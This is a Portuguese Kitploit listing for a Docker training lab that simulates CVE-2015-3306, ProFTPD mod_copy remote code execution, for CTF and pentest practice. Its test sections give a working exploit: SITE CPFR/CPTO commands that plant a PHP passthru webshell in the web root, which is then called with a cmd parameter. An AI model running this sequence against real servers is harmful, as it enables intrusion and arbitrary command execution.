Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2015-3306-Home-Lab — CVE-2015-3306 - ProFTPD - RCE Configuração de Home Lab (Docker) fácil de usar para Red Teaming ou Testes de Penetração | Kitploit
Ferramentas/GitHubGitHub/netw0rk7/cve-2015-3306-home-lab
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e EducaçãoRed TeamingLabs e Prática
GitHubnetw0rk7/cve-2015-3306-home-lab

CVE-2015-3306-Home-Lab

CVE-2015-3306 - ProFTPD - RCE Configuração de Home Lab (Docker) fácil de usar para Red Teaming ou Testes de Penetração

Ver Repositório
8há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

ProFTPD 1.3.5 (mod_copy) — Laboratório de Simulação de RCE

CVE20153306

Este laboratório foi projetado para simular a vulnerabilidade CVE-2015-3306 — ProFTPD mod_copy Remote File Copy to RCE
É usado para aprender Web Shell Injection RCE por meio do módulo mod_copy do ProFTPD.


Recursos

  • ProFTPD 1.3.5 vulnerável
  • mod_copy totalmente habilitado (SITE CPFR / SITE CPTO)
  • Suporte a FTP anônimo
  • Apache2 + PHP5 para simular a web root /var/www/html
  • O atacante pode usar SITE CPFR/CPTO para copiar arquivos para o webroot e acionar RCE
  • O sistema gera flag_RANDOM.txt automaticamente toda vez que o container é iniciado
  • É um laboratório para CTF / Red Team / Treinamento de Pentest

Estrutura de Diretórios

/etc/proftpd/proftpd.conf
/usr/local/proftpd/
/var/www/html/
/tmp/flag_xxx.txt
/entrypoint.sh

Uso (Executar Container)

docker build -t sentinel7-proftpd-lab .
docker run -it --rm -p 21:21 -p 80:80 sentinel7-proftpd-lab

Como Testar a Vulnerabilidade CVE-2015-3306

nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>

SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php

Abra no navegador:

http://<IP>/webshell.php?cmd=<command>

Flag

Armazenada em:

/tmp/flag_RANDOM.txt

Versão em Inglês — Laboratório de RCE ProFTPD 1.3.5 (mod_copy)

Este laboratório simula a CVE-2015-3306 usando ProFTPD 1.3.5 com mod_copy, permitindo que atacantes realizem ProFTPD mod_copy Remote File Copy to RCE.


Recursos

  • ProFTPD 1.3.5 vulnerável compilado a partir do código-fonte
  • mod_copy habilitado (SITE CPFR + SITE CPTO)
  • Acesso FTP anônimo
  • Apache2 + PHP5 para execução de webshell
  • flag_RANDOM.txt gerado automaticamente na inicialização do container
  • Perfeito para CTF, educação e pesquisa de exploits

Exemplo de Teste de Exploit

nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>

SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php

Em seguida, execute:

http://<IP>/webshell.php?cmd=<command>

Localização da Flag

/tmp/flag_RANDOM.txt

Aviso Legal

Apenas para fins educacionais e testes de penetração autorizados.

Baixar ferramenta